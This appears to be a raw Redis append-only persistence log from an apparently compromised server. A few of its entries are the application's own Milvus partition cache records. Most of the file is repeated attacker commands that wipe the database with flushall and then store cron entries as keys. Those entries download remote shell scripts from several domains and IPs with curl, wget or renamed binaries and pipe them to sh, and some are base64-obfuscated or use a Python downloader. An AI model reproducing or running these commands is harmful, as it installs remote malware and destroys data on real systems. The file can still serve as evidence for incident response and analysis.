*2
$6
SELECT
$1
0
*1
$8
flushall
*3
$3
set
$7
backup1
$65



*/2 * * * * cd1 -fsSL http://en2an.top/cleanfda/init.sh | sh


*3
$3
set
$7
backup2
$67



*/3 * * * * wget -q -O- http://en2an.top/cleanfda/init.sh | sh


*3
$3
set
$7
backup3
$69



*/4 * * * * curl -fsSL http://45.83.123.29/cleanfda/init.sh | sh


*3
$3
set
$7
backup4
$69



*/5 * * * * wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$70



*/2 * * * * root cd1 -fsSL http://en2an.top/cleanfda/init.sh | sh


*3
$3
set
$7
backup2
$72



*/3 * * * * root wget -q -O- http://en2an.top/cleanfda/init.sh | sh


*3
$3
set
$7
backup3
$74



*/4 * * * * root curl -fsSL http://45.83.123.29/cleanfda/init.sh | sh


*3
$3
set
$7
backup4
$74



*/5 * * * * root wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh


*1
$5
MULTI
*8
$4
HSET
$72
milvus:partitions:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$10
collection
$17
collection_chatty
$9
partition
$36
bot_fe878ea48b964a0fa3181b2f0edf113d
$6
status
$6
loaded
*3
$3
SET
$73
milvus:access_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$26
2025-10-27T13:58:25.457801
*3
$3
SET
$71
milvus:load_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$26
2025-10-27T13:58:25.457801
*3
$9
PEXPIREAT
$72
milvus:partitions:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$13
1761544704930
*3
$9
PEXPIREAT
$73
milvus:access_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$13
1761544704930
*3
$9
PEXPIREAT
$71
milvus:load_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$13
1761544704930
*1
$4
EXEC
*5
$3
SET
$73
milvus:access_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$26
2025-10-27T13:58:25.461821
$4
PXAT
$13
1761544704933
*1
$5
MULTI
*2
$3
DEL
$72
milvus:partitions:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
*2
$3
DEL
$73
milvus:access_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
*2
$3
DEL
$71
milvus:load_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
*1
$4
EXEC
*1
$5
MULTI
*8
$4
HSET
$72
milvus:partitions:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$10
collection
$17
collection_chatty
$9
partition
$36
bot_fe878ea48b964a0fa3181b2f0edf113d
$6
status
$6
loaded
*3
$3
SET
$73
milvus:access_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$26
2025-10-27T14:29:57.054037
*3
$3
SET
$71
milvus:load_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$26
2025-10-27T14:29:57.054037
*3
$9
PEXPIREAT
$72
milvus:partitions:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$13
1761546597480
*3
$9
PEXPIREAT
$73
milvus:access_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$13
1761546597480
*3
$9
PEXPIREAT
$71
milvus:load_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$13
1761546597480
*1
$4
EXEC
*5
$3
SET
$73
milvus:access_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$26
2025-10-27T14:29:57.057034
$4
PXAT
$13
1761546597481
*1
$5
MULTI
*8
$4
HSET
$72
milvus:partitions:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$10
collection
$17
collection_chatty
$9
partition
$36
bot_fe878ea48b964a0fa3181b2f0edf113d
$6
status
$6
loaded
*3
$3
SET
$73
milvus:access_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$26
2025-10-27T14:39:16.995382
*3
$3
SET
$71
milvus:load_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$26
2025-10-27T14:39:16.995382
*3
$9
PEXPIREAT
$72
milvus:partitions:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$13
1761547156784
*3
$9
PEXPIREAT
$73
milvus:access_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$13
1761547156784
*3
$9
PEXPIREAT
$71
milvus:load_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$13
1761547156784
*1
$4
EXEC
*5
$3
SET
$73
milvus:access_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$26
2025-10-27T14:39:16.998521
$4
PXAT
$13
1761547156787
*1
$5
MULTI
*8
$4
HSET
$72
milvus:partitions:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$10
collection
$17
collection_chatty
$9
partition
$36
bot_fe878ea48b964a0fa3181b2f0edf113d
$6
status
$6
loaded
*3
$3
SET
$73
milvus:access_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$26
2025-10-27T14:50:57.299727
*3
$3
SET
$71
milvus:load_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$26
2025-10-27T14:50:57.299727
*3
$9
PEXPIREAT
$72
milvus:partitions:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$13
1761547857670
*3
$9
PEXPIREAT
$73
milvus:access_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$13
1761547857670
*3
$9
PEXPIREAT
$71
milvus:load_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$13
1761547857670
*1
$4
EXEC
*5
$3
SET
$73
milvus:access_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$26
2025-10-27T14:50:57.302717
$4
PXAT
$13
1761547857671
*1
$8
flushall
*3
$3
set
$7
backup1
$63



*/2 * * * * cd1 -fsSL http://pyats.top/3nFTk7/init.sh | sh


*3
$3
set
$7
backup2
$65



*/3 * * * * wget -q -O- http://pyats.top/3nFTk7/init.sh | sh


*3
$3
set
$7
backup3
$67



*/4 * * * * curl -fsSL http://45.83.122.25/3nFTk7/init.sh | sh


*3
$3
set
$7
backup4
$67



*/5 * * * * wd1 -q -O- http://45.83.122.25/3nFTk7/init.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$68



*/2 * * * * root cd1 -fsSL http://pyats.top/3nFTk7/init.sh | sh


*3
$3
set
$7
backup2
$70



*/3 * * * * root wget -q -O- http://pyats.top/3nFTk7/init.sh | sh


*3
$3
set
$7
backup3
$72



*/4 * * * * root curl -fsSL http://45.83.122.25/3nFTk7/init.sh | sh


*3
$3
set
$7
backup4
$72



*/5 * * * * root wd1 -q -O- http://45.83.122.25/3nFTk7/init.sh | sh


*1
$5
MULTI
*8
$4
HSET
$72
milvus:partitions:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$10
collection
$17
collection_chatty
$9
partition
$36
bot_fe878ea48b964a0fa3181b2f0edf113d
$6
status
$6
loaded
*3
$3
SET
$73
milvus:access_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$26
2025-10-27T17:07:04.019605
*3
$3
SET
$71
milvus:load_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$26
2025-10-27T17:07:04.019605
*3
$9
PEXPIREAT
$72
milvus:partitions:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$13
1761638823303
*3
$9
PEXPIREAT
$73
milvus:access_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$13
1761638823303
*3
$9
PEXPIREAT
$71
milvus:load_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$13
1761638823303
*1
$4
EXEC
*5
$3
SET
$73
milvus:access_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
$26
2025-10-27T17:07:04.042614
$4
PXAT
$13
1761556023320
*1
$5
MULTI
*2
$3
DEL
$72
milvus:partitions:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
*2
$3
DEL
$73
milvus:access_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
*2
$3
DEL
$71
milvus:load_time:collection_chatty:bot_fe878ea48b964a0fa3181b2f0edf113d
*1
$4
EXEC
*1
$8
flushall
*3
$3
set
$7
backup1
$95



*/2 * * * * echo Y2QxIGh0dHA6Ly9raXNzLmEtZG9nLnRvcC9iMmY2MjgvYi5zaAo=|base64 -d|bash|bash 


*3
$3
set
$7
backup2
$106



*/3 * * * * echo d2dldCAtcSAtTy0gaHR0cDovL2tpc3MuYS1kb2cudG9wL2IyZjYyOC9iLnNoCg==|base64 -d|bash|bash


*3
$3
set
$7
backup3
$94



*/4 * * * * echo Y3VybCBodHRwOi8va2lzcy5hLWRvZy50b3AvYjJmNjI4L2Iuc2gK|base64 -d|bash|bash


*3
$3
set
$7
backup4
$125



@hourly  python -c "import urllib2; print urllib2.urlopen('http://ki\s\s.a-d\og.t\op/t.sh').read()" >.1;chmod +x .1;./.1


*1
$8
flushall
*3
$3
set
$7
backup1
$100



*/2 * * * * root echo Y2QxIGh0dHA6Ly9raXNzLmEtZG9nLnRvcC9iMmY2MjgvYi5zaAo=|base64 -d|bash|bash 


*3
$3
set
$7
backup2
$111



*/3 * * * * root echo d2dldCAtcSAtTy0gaHR0cDovL2tpc3MuYS1kb2cudG9wL2IyZjYyOC9iLnNoCg==|base64 -d|bash|bash


*3
$3
set
$7
backup3
$99



*/4 * * * * root echo Y3VybCBodHRwOi8va2lzcy5hLWRvZy50b3AvYjJmNjI4L2Iuc2gK|base64 -d|bash|bash


*3
$3
set
$7
backup4
$130



@hourly root  python -c "import urllib2; print urllib2.urlopen('http://ki\s\s.a-d\og.t\op/t.sh').read()" >.1;chmod +x .1;./.1


*1
$8
flushall
*3
$3
set
$7
backup1
$67



*/2 * * * * cd1 -fsSL http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$69



*/3 * * * * wget -q -O- http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$66



*/4 * * * * curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$66



*/5 * * * * wd1 -q -O- http://103.79.77.16/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$72



*/2 * * * * root cd1 -fsSL http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$74



*/3 * * * * root wget -q -O- http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$71



*/4 * * * * root curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$71



*/5 * * * * root wd1 -q -O- http://103.79.77.16/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$91



*/2 * * * * echo Y2QxIGh0dHA6Ly9zLm5hLWNzLmNvbS9iMmY2MjgvYi5zaAo=|base64 -d|bash|bash 


*3
$3
set
$7
backup2
$102



*/3 * * * * echo d2dldCAtcSAtTy0gaHR0cDovL3MubmEtY3MuY29tL2IyZjYyOC9iLnNoCg==|base64 -d|bash|bash


*3
$3
set
$7
backup3
$90



*/4 * * * * echo Y3VybCBodHRwOi8vcy5uYS1jcy5jb20vYjJmNjI4L2Iuc2gK|base64 -d|bash|bash


*3
$3
set
$7
backup4
$123



@hourly  python -c "import urllib2; print urllib2.urlopen('http://\\s.n\a-c\s.c\om/t.sh').read()" >.1;chmod +x .1;./.1


*1
$8
flushall
*3
$3
set
$7
backup1
$96



*/2 * * * * root echo Y2QxIGh0dHA6Ly9zLm5hLWNzLmNvbS9iMmY2MjgvYi5zaAo=|base64 -d|bash|bash 


*3
$3
set
$7
backup2
$107



*/3 * * * * root echo d2dldCAtcSAtTy0gaHR0cDovL3MubmEtY3MuY29tL2IyZjYyOC9iLnNoCg==|base64 -d|bash|bash


*3
$3
set
$7
backup3
$95



*/4 * * * * root echo Y3VybCBodHRwOi8vcy5uYS1jcy5jb20vYjJmNjI4L2Iuc2gK|base64 -d|bash|bash


*3
$3
set
$7
backup4
$123



@hourly  python -c "import urllib2; print urllib2.urlopen('http://\\s.n\a-c\s.c\om/t.sh').read()" >.1;chmod +x .1;./.1


*1
$8
flushall
*3
$3
set
$7
backup1
$67



*/2 * * * * cd1 -fsSL http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$69



*/3 * * * * wget -q -O- http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$66



*/4 * * * * curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$66



*/5 * * * * wd1 -q -O- http://103.79.77.16/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$72



*/2 * * * * root cd1 -fsSL http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$74



*/3 * * * * root wget -q -O- http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$71



*/4 * * * * root curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$71



*/5 * * * * root wd1 -q -O- http://103.79.77.16/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$67



*/2 * * * * cd1 -fsSL http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$69



*/3 * * * * wget -q -O- http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$66



*/4 * * * * curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$66



*/5 * * * * wd1 -q -O- http://103.79.77.16/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$72



*/2 * * * * root cd1 -fsSL http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$74



*/3 * * * * root wget -q -O- http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$71



*/4 * * * * root curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$71



*/5 * * * * root wd1 -q -O- http://103.79.77.16/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$67



*/2 * * * * cd1 -fsSL http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$69



*/3 * * * * wget -q -O- http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$66



*/4 * * * * curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$66



*/5 * * * * wd1 -q -O- http://103.79.77.16/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$72



*/2 * * * * root cd1 -fsSL http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$74



*/3 * * * * root wget -q -O- http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$71



*/4 * * * * root curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$71



*/5 * * * * root wd1 -q -O- http://103.79.77.16/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$68



*/2 * * * * cd1 -fsSL http://natalstatus.org/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$70



*/3 * * * * wget -q -O- http://natalstatus.org/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$66



*/4 * * * * curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$66



*/5 * * * * wd1 -q -O- http://103.79.77.16/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$73



*/2 * * * * root cd1 -fsSL http://natalstatus.org/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$75



*/3 * * * * root wget -q -O- http://natalstatus.org/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$71



*/4 * * * * root curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$71



*/5 * * * * root wd1 -q -O- http://103.79.77.16/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$68



*/2 * * * * cd1 -fsSL http://natalstatus.org/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$70



*/3 * * * * wget -q -O- http://natalstatus.org/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$66



*/4 * * * * curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$66



*/5 * * * * wd1 -q -O- http://103.79.77.16/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$73



*/2 * * * * root cd1 -fsSL http://natalstatus.org/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$75



*/3 * * * * root wget -q -O- http://natalstatus.org/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$71



*/4 * * * * root curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$71



*/5 * * * * root wd1 -q -O- http://103.79.77.16/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$66



*/2 * * * * cd1 -fsSL http://45.83.122.25/3nFTk7/init.sh | sh


*3
$3
set
$7
backup2
$68



*/3 * * * * wget -q -O- http://45.83.122.25/3nFTk7/init.sh | sh


*3
$3
set
$7
backup3
$64



*/4 * * * * curl -fsSL http://pyats.top/3nFTk7/init.sh | sh


*3
$3
set
$7
backup4
$64



*/5 * * * * wd1 -q -O- http://pyats.top/3nFTk7/init.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$71



*/2 * * * * root cd1 -fsSL http://45.83.122.25/3nFTk7/init.sh | sh


*3
$3
set
$7
backup2
$73



*/3 * * * * root wget -q -O- http://45.83.122.25/3nFTk7/init.sh | sh


*3
$3
set
$7
backup3
$69



*/4 * * * * root curl -fsSL http://pyats.top/3nFTk7/init.sh | sh


*3
$3
set
$7
backup4
$69



*/5 * * * * root wd1 -q -O- http://pyats.top/3nFTk7/init.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$66



*/2 * * * * cd1 -fsSL http://45.83.122.25/3nFTk7/init.sh | sh


*3
$3
set
$7
backup2
$68



*/3 * * * * wget -q -O- http://45.83.122.25/3nFTk7/init.sh | sh


*3
$3
set
$7
backup3
$64



*/4 * * * * curl -fsSL http://pyats.top/3nFTk7/init.sh | sh


*3
$3
set
$7
backup4
$64



*/5 * * * * wd1 -q -O- http://pyats.top/3nFTk7/init.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$71



*/2 * * * * root cd1 -fsSL http://45.83.122.25/3nFTk7/init.sh | sh


*3
$3
set
$7
backup2
$73



*/3 * * * * root wget -q -O- http://45.83.122.25/3nFTk7/init.sh | sh


*3
$3
set
$7
backup3
$69



*/4 * * * * root curl -fsSL http://pyats.top/3nFTk7/init.sh | sh


*3
$3
set
$7
backup4
$69



*/5 * * * * root wd1 -q -O- http://pyats.top/3nFTk7/init.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$67



*/2 * * * * cd1 -fsSL http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$69



*/3 * * * * wget -q -O- http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$66



*/4 * * * * curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$66



*/5 * * * * wd1 -q -O- http://103.79.77.16/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$72



*/2 * * * * root cd1 -fsSL http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$74



*/3 * * * * root wget -q -O- http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$71



*/4 * * * * root curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$71



*/5 * * * * root wd1 -q -O- http://103.79.77.16/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$67



*/2 * * * * cd1 -fsSL http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$69



*/3 * * * * wget -q -O- http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$66



*/4 * * * * curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$66



*/5 * * * * wd1 -q -O- http://103.79.77.16/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$72



*/2 * * * * root cd1 -fsSL http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$74



*/3 * * * * root wget -q -O- http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$71



*/4 * * * * root curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$71



*/5 * * * * root wd1 -q -O- http://103.79.77.16/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$68



*/2 * * * * cd1 -fsSL http://natalstatus.org/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$70



*/3 * * * * wget -q -O- http://natalstatus.org/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$66



*/4 * * * * curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$66



*/5 * * * * wd1 -q -O- http://103.79.77.16/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$73



*/2 * * * * root cd1 -fsSL http://natalstatus.org/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$75



*/3 * * * * root wget -q -O- http://natalstatus.org/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$71



*/4 * * * * root curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$71



*/5 * * * * root wd1 -q -O- http://103.79.77.16/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$91



*/2 * * * * echo Y2QxIGh0dHA6Ly9zLm5hLWNzLmNvbS9iMmY2MjgvYi5zaAo=|base64 -d|bash|bash 


*3
$3
set
$7
backup2
$102



*/3 * * * * echo d2dldCAtcSAtTy0gaHR0cDovL3MubmEtY3MuY29tL2IyZjYyOC9iLnNoCg==|base64 -d|bash|bash


*3
$3
set
$7
backup3
$90



*/4 * * * * echo Y3VybCBodHRwOi8vcy5uYS1jcy5jb20vYjJmNjI4L2Iuc2gK|base64 -d|bash|bash


*3
$3
set
$7
backup4
$123



@hourly  python -c "import urllib2; print urllib2.urlopen('http://\\s.n\a-c\s.c\om/t.sh').read()" >.1;chmod +x .1;./.1


*1
$8
flushall
*3
$3
set
$7
backup1
$96



*/2 * * * * root echo Y2QxIGh0dHA6Ly9zLm5hLWNzLmNvbS9iMmY2MjgvYi5zaAo=|base64 -d|bash|bash 


*3
$3
set
$7
backup2
$107



*/3 * * * * root echo d2dldCAtcSAtTy0gaHR0cDovL3MubmEtY3MuY29tL2IyZjYyOC9iLnNoCg==|base64 -d|bash|bash


*3
$3
set
$7
backup3
$95



*/4 * * * * root echo Y3VybCBodHRwOi8vcy5uYS1jcy5jb20vYjJmNjI4L2Iuc2gK|base64 -d|bash|bash


*3
$3
set
$7
backup4
$123



@hourly  python -c "import urllib2; print urllib2.urlopen('http://\\s.n\a-c\s.c\om/t.sh').read()" >.1;chmod +x .1;./.1


*1
$8
flushall
*3
$3
set
$7
backup1
$67



*/2 * * * * cd1 -fsSL http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$69



*/3 * * * * wget -q -O- http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$66



*/4 * * * * curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$66



*/5 * * * * wd1 -q -O- http://103.79.77.16/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$72



*/2 * * * * root cd1 -fsSL http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$74



*/3 * * * * root wget -q -O- http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$71



*/4 * * * * root curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$71



*/5 * * * * root wd1 -q -O- http://103.79.77.16/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$67



*/2 * * * * cd1 -fsSL http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$69



*/3 * * * * wget -q -O- http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$66



*/4 * * * * curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$66



*/5 * * * * wd1 -q -O- http://103.79.77.16/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$72



*/2 * * * * root cd1 -fsSL http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$74



*/3 * * * * root wget -q -O- http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$71



*/4 * * * * root curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$71



*/5 * * * * root wd1 -q -O- http://103.79.77.16/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$67



*/2 * * * * cd1 -fsSL http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$69



*/3 * * * * wget -q -O- http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$66



*/4 * * * * curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$66



*/5 * * * * wd1 -q -O- http://103.79.77.16/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$72



*/2 * * * * root cd1 -fsSL http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$74



*/3 * * * * root wget -q -O- http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$71



*/4 * * * * root curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$71



*/5 * * * * root wd1 -q -O- http://103.79.77.16/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$72



*/2 * * * * cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh


*3
$3
set
$7
backup2
$74



*/3 * * * * wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh


*3
$3
set
$7
backup3
$90



*/4 * * * * curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh


*3
$3
set
$7
backup4
$90



*/5 * * * * wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$77



*/2 * * * * root cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh


*3
$3
set
$7
backup2
$79



*/3 * * * * root wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh


*3
$3
set
$7
backup3
$95



*/4 * * * * root curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh


*3
$3
set
$7
backup4
$95



*/5 * * * * root wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$68



*/2 * * * * cd1 -fsSL http://natalstatus.org/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$70



*/3 * * * * wget -q -O- http://natalstatus.org/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$65



*/4 * * * * curl -fsSL http://45.89.52.41/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$65



*/5 * * * * wd1 -q -O- http://45.89.52.41/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$73



*/2 * * * * root cd1 -fsSL http://natalstatus.org/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$75



*/3 * * * * root wget -q -O- http://natalstatus.org/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$70



*/4 * * * * root curl -fsSL http://45.89.52.41/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$70



*/5 * * * * root wd1 -q -O- http://45.89.52.41/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$67



*/2 * * * * cd1 -fsSL http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup2
$69



*/3 * * * * wget -q -O- http://194.110.247.97/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup3
$66



*/4 * * * * curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh


*3
$3
set
$7
backup4
$66



*/5 * * * * wd1 -q -O- http://103.79.77.16/ep9TS2/ndt.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$72



